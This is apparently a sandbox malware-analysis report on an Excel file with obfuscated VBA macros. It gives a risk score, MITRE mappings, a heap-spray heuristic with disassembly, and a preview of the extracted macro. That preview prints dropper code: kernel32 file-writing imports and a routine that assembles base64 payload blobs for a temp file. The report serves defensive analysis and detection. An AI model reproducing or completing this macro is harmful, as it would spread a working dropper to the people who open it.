MALICIOUS
62
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
T1566.001 Spearphishing Attachment
The file is an Office document containing VBA macros. The macros appear to be obfuscated and attempt to write a file to disk, likely to download and execute a second-stage payload. The document body contains a list of names and addresses, which could be used as a lure for a phishing campaign.
Heuristics 3
-
Heap-spray pattern detected — severity: high — SC_HEAP_SPRAY: repeated 0x41 ("A") bytes found
Disassembly
Attempted x86 opcode disassembly (linear sweep over the repeated 0x41 bytes; every byte decodes as `inc ecx`. The macro preview below contains a long literal run of "A" characters, so this region may be string padding rather than executable code — treat the heap-spray verdict as a hint to be confirmed, not as proof of shellcode): 00044DDA 41 inc ecx 00044DDB 41 inc ecx 00044DDC 41 inc ecx 00044DDD 41 inc ecx 00044DDE 41 inc ecx 00044DDF 41 inc ecx 00044DE0 41 inc ecx 00044DE1 41 inc ecx 00044DE2 41 inc ecx 00044DE3 41 inc ecx 00044DE4 41 inc ecx 00044DE5 41 inc ecx 00044DE6 41 inc ecx 00044DE7 41 inc ecx 00044DE8 41 inc ecx 00044DE9 41 inc ecx 00044DEA 41 inc ecx 00044DEB 41 inc ecx 00044DEC 41 inc ecx 00044DED 41 inc ecx 00044DEE 41 inc ecx 00044DEF 41 inc ecx 00044DF0 41 inc ecx 00044DF1 41 inc ecx 00044DF2 41 inc ecx 00044DF3 41 inc ecx 00044DF4 41 inc ecx 00044DF5 41 inc ecx 00044DF6 41 inc ecx 00044DF7 41 inc ecx 00044DF8 41 inc ecx 00044DF9 41 inc ecx 00044DFA 41 inc ecx 00044DFB 41 inc ecx 00044DFC 41 inc ecx 00044DFD 41 inc ecx 00044DFE 41 inc ecx 00044DFF 41 inc ecx 00044E00 41 inc ecx 00044E01 41 inc ecx 00044E02 41 inc ecx 00044E03 41 inc ecx 00044E04 41 inc ecx 00044E05 41 inc ecx 00044E06 41 inc ecx 00044E07 41 inc ecx 00044E08 41 inc ecx 00044E09 41 inc ecx 00044E0A 41 inc ecx 00044E0B 41 inc ecx 00044E0C 41 inc ecx 00044E0D 41 inc ecx 00044E0E 41 inc ecx 00044E0F 41 inc ecx 00044E10 41 inc ecx 00044E11 41 inc ecx 00044E12 41 inc ecx 00044E13 41 inc ecx 00044E14 41 inc ecx 00044E15 41 inc ecx 00044E16 41 inc ecx 00044E17 41 inc ecx 00044E18 41 inc ecx 00044E19 41 inc ecx 00044E1A 41 inc ecx 00044E1B 41 inc ecx 00044E1C 41 inc ecx 00044E1D 41 inc ecx 00044E1E 41 inc ecx 00044E1F 41 inc ecx 00044E20 41 inc ecx 00044E21 41 inc ecx 00044E22 41 inc ecx 00044E23 41 inc ecx 00044E24 41 inc ecx 00044E25 41 inc ecx 00044E26 41 inc ecx 00044E27 41 inc ecx 00044E28 41 inc ecx 00044E29 41 inc ecx 00044E2A 41 inc ecx 00044E2B 41 inc ecx 00044E2C 41 inc ecx 00044E2D 41 inc ecx 00044E2E 41 inc ecx 00044E2F 41 inc ecx 00044E30 41 inc ecx 00044E31 41 inc ecx 00044E32 41 inc ecx 00044E33 41 inc ecx 00044E34 41 inc ecx 00044E35 41 inc ecx 00044E36 41 inc ecx 00044E37 41 inc ecx 00044E38 41 inc ecx 00044E39 41 inc ecx
-
VBA macros detected — severity: medium — OLE_VBA_MACROS: document contains VBA macro code
-
Suspicious extracted artifact — severity: info — EXTRACTED_FILE_STATIC_TRIAGE: one or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9806 bytes |

SHA-256: b736076d4e4aa4a14cbe3f79ba1cfefdfc6d840d323c4c62e00c930a47b82a24

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely — the carved artifact contains 15 long base64-like blob(s).
Preview script — first 1,000 lines of the extracted script
' Module header as exported by olevba: this is the "ThisWorkbook" document
' module, i.e. code attached to the workbook object itself.
' The VB_Base GUID is the module's base class identifier; it appears to be
' the Excel Workbook coclass CLSID — confirm before relying on it.
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'<!!blackice>
' Standard base64 alphabet (RFC 4648 order). Its presence alongside the large
' string blobs assembled in runblackice suggests the macro carries a
' base64-encoded payload that it decodes itself rather than calling a
' library routine — the decoder body is not visible in this preview.
Private Const base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
' Raw Win32 file-I/O imports from kernel32. Declaring these directly (instead
' of using VBA's Open/Put or FileSystemObject) is a common way to avoid the
' string-based indicators that simple macro scanners look for; the
' combination of CreateFileA + WriteFile + GetTempPathA + GetTempFileNameA is
' consistent with the report's "writes a file to disk" assessment, most
' likely a dropped file in the user's temp directory (inferred, not shown).
' Detection note: a VBA module that imports GetTempFileNameA and WriteFile
' from kernel32 is a strong static indicator worth a dedicated YARA/olevba rule.
Private Declare Function CreateFile Lib "kernel32" Alias "CreateFileA" (ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, ByVal lpSecurityAttributes As Long, ByVal dwCreationDistribution As Long, ByVal dwFlagsAndAttributes As Long, ByVal hTemplate As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Declare Function WriteFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Byte, ByVal dwNumberOfBytesToWrite As Long, lpNumberOfBytesWritten As Long, ByVal lpOverlapped As Long) As Long
Private Declare Function GetTempPath Lib "kernel32" Alias "GetTempPathA" (ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long
Private Declare Function GetTempFileName Lib "kernel32" Alias "GetTempFileNameA" (ByVal lpPathName As String, ByVal lpPrefixString As String, ByVal uUnique As Long, ByVal lpTempFileName As String) As Long
Private Sub runblackice()
On Error Resume Next
filestring = "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"
filestring = filestring + "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"
filestring = filestring + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAzMwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAz"
filestring = filestring + "MwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAAAACZmWbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzAAzMwCZmfj4+JnM/5n//5nM/5n//5nM/5n//5n//5nM/5n//5nM/5n//5n//5n//5nM/5n//5nM/5n//5n//5nM/5nM/5n//5nM/5n//5nM/5nM/5nM/5n//5nM/2bMzAAzMwCZmfj4+Jn//5n//5n//5nM/5n//5nM/5n//5n//5nM/5n//5n//5nM/5nM/5n//5nM/5n//5nM/5nM/5n//5n//5nM/5nM/5nM/5n//5nM/5nM/5nM/5nM/2bMzAAzMwCZmfj4+JnM/5n//5n//5n//5n//5n//5nM/5n//5n//5nM/5nM/5n//5n//5nM/5n//5nM/5n/"
filestring = filestring + "/5n//5nM/5nM/5nM/5n//5nM/5nM/5nM/5nM/5nM/5nM/2bMzAAzMwCZmfj4+Jn//5n//5nM/5n//5nM/5n//5n//5nM/5n//5n//5n//5nM/5n//5nM/5n//5n//5nM/5n//5n//5nM/5nM/5nM/5n//5nM/5n//5n//5nM/5nM/2bMzAAzMwCZmfj4+Jn//5n//5n//5n//5n//5n//5n//5n//5n//5nM/5n//5n//5nM/5n//5nM/5nM/5n//5nM/5nM/5n//5n//5n//5nM/5nM/5nM/5nM/5n//5nM/2bMzAAzMwCZmfj4+Jn//5nM/5n//5nM/5n//5n//5nM/5n//5nM/5n//5n//5nM/5n//5nM/5n//5n//5n//5n//5n//5nM/5nM/5nM/5nM/5n//5nM/5nM/5nM/5nM/2bMzAAzMwCZmfj4+Jn//5n//5n//5n//5n//5n//5n//5n//5n//5nM/5n//5n//5n//5n//5n//5nM/5n/"
filestring = filestring + "/5nM/5nM/5n//5nM/5nM/5n//5nM/5nM/5n//5nM/5n//2bMzAAzMwCZmfj4+Jn//5n//5n//5n//5n//5n//5nM/5n//5n//5n//5nM/5n//5nM/5n//5nM/5n//5nM/5n//5n//5nM/5n//5n//5nM/5n//5n//5nM/5nM/5nM/2bMzAAzMwCZmfj4+Jn//5n//5n//5n//5nM/5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5nM/5n//5nM/5nM/5n//5nM/5nM/5nM/5n//5nM/2bMzAAzMwCZmfj4+Jn//5n//5n//5n//5n//5n//5n//5n//5nM/5n//5nM/5n//5nM/5n//5nM/5nM/5n//5nM/5n//5n//5n//5n//5nM/5n//5n//5nM/5nM/5n//2bMzAAzMwCZmfj4+Jn//5n//5n//5n//5n//5n//5nM/5n//5n//5n//5n//5n//5n//5n//5n//5n//5n/"
filestring = filestring + "/5n//5nM/5n//5nM/5n//5n//5nM/5nM/5n//5n//5nM/2bMzAAzMwCZmfj4+Jn//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5nM/5n//5n//5nM/5n//5nM/5n//5n//5nM/5n//5n//5nM/5n//5n//5n//5nM/5n//2bMzAAzMwCZmfj4+Jn//5n//5n//5n//5n//5n//5n//5n//5nM/5n//5n//5n//5n//5nM/5n//5n//5n//5n//5n//5n//5n//5nM/5n//5n//5nM/5nM/5n//5nM/2bMzAAzMwCZmfj4+Jn//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5nM/5n//5nM/5n//5nM/5n//5nM/5n//5n//5n//5nM/5n//2bMzAAzMwCZmfj4+Jn//5n//5n//5n//5n//5n//5n//5n//5n//5n//5nM/5n//5nM/5n//5nM/5n//5n/"
filestring = filestring + "/5n//5n//5n//5n//5n//5n//5nM/5n//5nM/5n//5nM/2bMzAAzMwCZmfj4+Jn//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5nM/5n//5nM/5n//5n//5n//5nM/5n//5n//5n//5n//5nM/2bMzAAzMwCZmfj4+Jn//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5nM/5n//5n//5nM/5nM/5n//5n//5n//2bMzAAzMwCZmfj4+Jn//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5nM/5n//5nM/5n//5nM/5n//5n//5n//5nM/5n//5n//5n//5nM/5n//5nM/2bMzAAzMwCZmfj4+Jn//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n/"
filestring = filestring + "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"
filestring = filestring + "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"
filestring = filestring + "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"
filestring = filestring + "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"
filestring = filestring + "VfwCkUoPcCBC+QfFDG4cYs5ooEYHQtCKInaQNOGlATeKcITiZED/UYoEv1LPiiGsFIUcSGkQoHbfjMB1emOKOqNMOLE9JDXxVQHiUgrKpKYf/HdaemuRDNJyMtQsQlCZMkTcI8xATOERyy6sk9bdCOFRPkHxDEwc1IRD2CHckeBE/byEKU3QkwIB6Cf6lPvJTKSVTCoBSNTXxZxQRC36+SMUc3vdt3JMUklToEcMWMT4J1jEnCdYxIQnWEoZu2gDv/SSTULgWPVGoyqEdlkktEzmnWEAM8DrG+l13ZFUcAUidznrgTqLO5U8nz2dJZsUXSLkAiyFSLZHaPQRomCGhXAlKIO9BrtmCMkGuLV4I85pKJU5u2yhNOuwcpMGhLEWrnU8NWg5y3hM99NFLZVkEwhKMI0gJjNClWyoEulCEBIihXjuV1gEACz4N8huS4eKdZmF+OyOwCgsMEKVSbwh7Atm+DIyNqCQhXP2lEx7iRz9N8Ij9EJEEhAc/YQhfnSu"
filestring = filestring + "QB1NbI4UlRUIUuhZzdczsp6RElYrTLUh7Arj94N2RXFD0vQpLoTMRSkPiZiRQ19ipsTwRFpDgEEG4A+VJsCItAbrBMYKVgH5lyR/JDbeSnOA4FCFQ4VYXJmaJFErPUs0RXTm2lMahYg3aVaNQiNRzlkohZA6CVXYgeISynALSWbNyIjkjCiQhRCUsmQZhAkJvHAGyUn2z6UsGlVPBDEWlUS/Iy6RKWJocL4+/QwUhUQVaQ6f8ngZRA8hKvCyA4q6Os8RJAnZiAxEh4ja9XYjYAORfE0niAGp4MuarmZIuLFYjTHIShCFyEIQjchKRJwhlXxiAdDFEGX17OZFAjzXGo0gIymgxZOSuDIIIBaUACG48J4Ck2mRdFxLJiUUYMAPhNGtvqHSyMh1IfDWEAJo0Mt0HvEldfQasj6tS+xssyRY/vHo3IYhJP4J7W9ls5CqkMe0o7bohUhcHdKCuY2JCkW85NxRJ0oov+SMnuNJQQOFIwIgQUOVIFFDhUooy9yE"
filestring = filestring + "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"
' Module header for the "Sheet1" worksheet module. No code follows it in the
' preview, so this module appears to be empty apart from its attributes; the
' VB_Base GUID appears to be the Excel Worksheet coclass CLSID — confirm.
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||